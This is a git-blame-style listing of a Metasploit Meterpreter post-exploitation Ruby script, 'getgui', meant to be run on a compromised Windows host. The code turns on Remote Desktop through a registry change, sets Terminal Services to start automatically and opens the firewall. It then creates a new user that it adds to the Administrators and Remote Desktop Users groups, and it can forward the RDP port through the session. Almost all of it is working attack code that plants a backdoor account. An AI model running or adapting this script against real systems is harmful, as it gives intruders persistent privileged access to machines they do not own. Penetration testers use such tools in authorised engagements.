2009-10-26 15:14:28 +00:00
|
|
|
|
# $Id$
|
2009-10-26 04:41:51 +00:00
|
|
|
|
#
|
|
|
|
|
|
# Meterpreter script for enabling Remote Desktop on Windows 2003, Windows Vista
|
|
|
|
|
|
# Windows 2008 and Windows XP targets using native windows commands.
|
|
|
|
|
|
# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
2010-04-24 13:39:55 +00:00
|
|
|
|
# Support for German Systems added by L0rdAli3n debian5[at]web.de
|
|
|
|
|
|
# Version: 0.1.2
|
2009-10-26 04:41:51 +00:00
|
|
|
|
# Note: Port Forwarding option provided by Natron at natron[at]invisibledenizen.org
|
|
|
|
|
|
# We are still working in making this option more stable.
|
|
|
|
|
|
################## Variable Declarations ##################
|
|
|
|
|
|
|
|
|
|
|
|
session = client
|
2010-06-15 22:11:48 +00:00
|
|
|
|
host_name = client.sys.config.sysinfo['Computer']
|
|
|
|
|
|
# Create Filename info to be appended to downloaded files
|
|
|
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
|
|
|
|
|
|
|
|
|
|
# Create a directory for the logs
|
|
|
|
|
|
logs = ::File.join(Msf::Config.log_directory, 'getgui', host_name + filenameinfo )
|
|
|
|
|
|
|
|
|
|
|
|
# Create the log directory
|
|
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
|
|
|
|
|
|
|
|
# Cleaup script file name
|
|
|
|
|
|
@dest = logs + "/clean_up_" + filenameinfo + ".rc"
|
|
|
|
|
|
|
2009-10-26 04:41:51 +00:00
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
|
|
|
|
|
"-h" => [ false, "Help menu." ],
|
|
|
|
|
|
"-e" => [ false, "Enable RDP only." ],
|
2010-04-24 13:39:55 +00:00
|
|
|
|
"-l" => [ true, "The language switch\n\t\tPossible Options: 'de_DE', 'en_EN' / default is: 'en_EN'" ],
|
2009-10-26 04:41:51 +00:00
|
|
|
|
"-p" => [ true, "The Password of the user to add." ],
|
2009-12-25 13:38:46 +00:00
|
|
|
|
"-u" => [ true, "The Username of the user to add." ],
|
|
|
|
|
|
"-f" => [ true, "Forward RDP Connection." ]
|
2009-10-26 04:41:51 +00:00
|
|
|
|
)
|
|
|
|
|
|
def usage
|
|
|
|
|
|
print_line("Windows Remote Desktop Enabler Meterpreter Script")
|
|
|
|
|
|
print_line("Usage: getgui -u <username> -p <password>")
|
|
|
|
|
|
print_line("Or: getgui -e")
|
|
|
|
|
|
print(@@exec_opts.usage)
|
|
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
2010-06-15 22:11:48 +00:00
|
|
|
|
def langdetect(lang)
|
|
|
|
|
|
puts "langdetect"
|
2010-04-24 13:39:55 +00:00
|
|
|
|
if lang != nil
|
|
|
|
|
|
print_status("Language set by user to: '#{lang}'")
|
|
|
|
|
|
else
|
|
|
|
|
|
print_status("Language detection started")
|
|
|
|
|
|
lang = client.sys.config.sysinfo['System Language']
|
|
|
|
|
|
if lang != nil
|
|
|
|
|
|
print_status("\tLanguage detected: #{lang}")
|
|
|
|
|
|
else
|
|
|
|
|
|
print_error("\tLanguage detection failed, falling back to default 'en_EN'")
|
|
|
|
|
|
lang = "en_EN"
|
|
|
|
|
|
end
|
|
|
|
|
|
end
|
2010-06-15 22:11:48 +00:00
|
|
|
|
rescue::Exception => e
|
|
|
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
2010-04-24 13:39:55 +00:00
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
2010-06-15 22:11:48 +00:00
|
|
|
|
def enablerd()
|
2009-10-26 04:41:51 +00:00
|
|
|
|
key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
|
|
|
|
|
|
value = "fDenyTSConnections"
|
|
|
|
|
|
begin
|
2010-06-15 22:11:48 +00:00
|
|
|
|
v = registry_getvaldata(key,value)
|
|
|
|
|
|
print_status "Enabling Remote Desktop"
|
|
|
|
|
|
if v == 1
|
|
|
|
|
|
print_status "\tRDP is disabled; enabling it ..."
|
|
|
|
|
|
registry_setvaldata(key,value,0,"REG_DWORD")
|
|
|
|
|
|
file_local_write2file(@dest,"reg setval -k \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" -v 'fDenyTSConnections' -d \"1\"")
|
|
|
|
|
|
else
|
|
|
|
|
|
print_status "\tRDP is already enabled"
|
|
|
|
|
|
end
|
2009-10-26 04:41:51 +00:00
|
|
|
|
rescue::Exception => e
|
2010-06-15 22:11:48 +00:00
|
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
2009-10-26 04:41:51 +00:00
|
|
|
|
end
|
2010-05-03 17:13:09 +00:00
|
|
|
|
|
2009-10-26 04:41:51 +00:00
|
|
|
|
end
|
2010-04-24 13:39:55 +00:00
|
|
|
|
|
|
|
|
|
|
|
2010-06-15 22:11:48 +00:00
|
|
|
|
def enabletssrv()
|
|
|
|
|
|
rdp_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService"
|
2009-10-26 04:41:51 +00:00
|
|
|
|
begin
|
2010-06-15 22:11:48 +00:00
|
|
|
|
v2 = registry_getvaldata(rdp_key,"Start")
|
|
|
|
|
|
print_status "Setting Terminal Services service startup mode"
|
|
|
|
|
|
if v2 != 2
|
|
|
|
|
|
print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..."
|
|
|
|
|
|
service_change_startup("TermService","auto")
|
|
|
|
|
|
file_local_write2file(@dest,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"")
|
|
|
|
|
|
cmd_exec("sc start termservice")
|
|
|
|
|
|
file_local_write2file(@dest,"execute -H -f cmd.exe -a \"/c sc stop termservice\"")
|
|
|
|
|
|
|
|
|
|
|
|
else
|
|
|
|
|
|
print_status "\tTerminal Services service is already set to auto"
|
|
|
|
|
|
end
|
|
|
|
|
|
#Enabling Exception on the Firewall
|
|
|
|
|
|
print_status "\tOpening port in local firewall if necessary"
|
|
|
|
|
|
cmd_exec('netsh firewall set service type = remotedesktop mode = enable')
|
|
|
|
|
|
file_local_write2file(@dest,"execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'")
|
2009-10-26 04:41:51 +00:00
|
|
|
|
rescue::Exception => e
|
2010-06-15 22:11:48 +00:00
|
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
2009-10-26 04:41:51 +00:00
|
|
|
|
end
|
|
|
|
|
|
end
|
2010-04-24 13:39:55 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def addrdpusr(session, username, password, lang)
|
|
|
|
|
|
# Changing the group names depending on the selected language
|
|
|
|
|
|
case lang
|
2010-06-15 22:11:48 +00:00
|
|
|
|
when "en_EN"
|
|
|
|
|
|
rdu = "Remote Desktop Users"
|
|
|
|
|
|
admin = "Administrators"
|
|
|
|
|
|
when "de_DE"
|
|
|
|
|
|
rdu = "Remotedesktopbenutzer"
|
|
|
|
|
|
admin = "Administratoren"
|
|
|
|
|
|
when "fr_FR"
|
|
|
|
|
|
rdu = "Utilisateurs du Bureau <20> distance"
|
|
|
|
|
|
admin = "Administrateurs"
|
2010-04-24 13:39:55 +00:00
|
|
|
|
end
|
2010-06-15 22:11:48 +00:00
|
|
|
|
|
2009-10-26 04:41:51 +00:00
|
|
|
|
print_status "Setting user account for logon"
|
|
|
|
|
|
print_status "\tAdding User: #{username} with Password: #{password}"
|
|
|
|
|
|
begin
|
2010-06-15 22:11:48 +00:00
|
|
|
|
cmd_exec("net user #{username} #{password} /add")
|
|
|
|
|
|
file_local_write2file(@dest,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
|
|
|
|
|
|
print_status "\tAdding User: #{username} to local group '#{rdu}'"
|
|
|
|
|
|
cmd_exec("net localgroup \"#{rdu}\" #{username} /add")
|
|
|
|
|
|
|
|
|
|
|
|
print_status "\tAdding User: #{username} to local group '#{admin}'"
|
|
|
|
|
|
cmd_exec("net localgroup #{admin} #{username} /add")
|
|
|
|
|
|
print_status "You can now login with the created user"
|
2009-10-26 04:41:51 +00:00
|
|
|
|
rescue::Exception => e
|
2010-06-15 22:11:48 +00:00
|
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
2009-10-26 04:41:51 +00:00
|
|
|
|
end
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
2009-01-08 18:14:03 +00:00
|
|
|
|
def message
|
2009-10-26 04:41:51 +00:00
|
|
|
|
print_status "Windows Remote Desktop Configuration Meterpreter Script by Darkoperator"
|
2009-01-08 18:14:03 +00:00
|
|
|
|
print_status "Carlos Perez carlos_perez@darkoperator.com"
|
2009-10-26 04:41:51 +00:00
|
|
|
|
end
|
|
|
|
|
|
################## MAIN ##################
|
|
|
|
|
|
# Parsing of Options
|
|
|
|
|
|
usr = nil
|
|
|
|
|
|
pass = nil
|
2010-04-24 13:39:55 +00:00
|
|
|
|
lang = nil
|
2009-12-25 13:38:46 +00:00
|
|
|
|
lport = 1024 + rand(1024)
|
2009-10-26 04:41:51 +00:00
|
|
|
|
enbl = nil
|
2009-12-25 13:38:46 +00:00
|
|
|
|
frwrd = nil
|
|
|
|
|
|
|
2009-10-26 04:41:51 +00:00
|
|
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
|
|
|
|
|
case opt
|
2010-06-15 22:11:48 +00:00
|
|
|
|
when "-u"
|
|
|
|
|
|
usr = val
|
|
|
|
|
|
when "-p"
|
|
|
|
|
|
pass = val
|
|
|
|
|
|
when "-h"
|
|
|
|
|
|
usage
|
|
|
|
|
|
when "-l"
|
|
|
|
|
|
lang = val
|
|
|
|
|
|
when "-f"
|
|
|
|
|
|
frwrd = true
|
|
|
|
|
|
lport = val
|
|
|
|
|
|
when "-e"
|
|
|
|
|
|
enbl = true
|
|
|
|
|
|
end
|
2009-10-26 04:41:51 +00:00
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
if enbl
|
2009-01-08 18:14:03 +00:00
|
|
|
|
message
|
2010-06-15 22:11:48 +00:00
|
|
|
|
enablerd()
|
|
|
|
|
|
enabletssrv()
|
|
|
|
|
|
print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
|
2009-01-08 18:14:03 +00:00
|
|
|
|
|
2009-10-26 04:41:51 +00:00
|
|
|
|
elsif usr != nil && pass != nil
|
2009-01-08 18:14:03 +00:00
|
|
|
|
message
|
2010-06-15 22:11:48 +00:00
|
|
|
|
langdetect(lang)
|
|
|
|
|
|
enablerd()
|
|
|
|
|
|
enabletssrv()
|
2010-04-24 13:39:55 +00:00
|
|
|
|
addrdpusr(session, usr, pass, lang)
|
2010-06-15 22:11:48 +00:00
|
|
|
|
print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
|
2009-10-26 04:41:51 +00:00
|
|
|
|
|
|
|
|
|
|
else
|
|
|
|
|
|
usage
|
|
|
|
|
|
end
|
2009-12-25 13:38:46 +00:00
|
|
|
|
if frwrd == true
|
|
|
|
|
|
print_status("Starting the port forwarding at local port #{lport}")
|
|
|
|
|
|
client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 3389 -r 127.0.0.1")
|
|
|
|
|
|
end
|
2009-10-26 04:41:51 +00:00
|
|
|
|
|
2010-06-15 22:11:48 +00:00
|
|
|
|
|
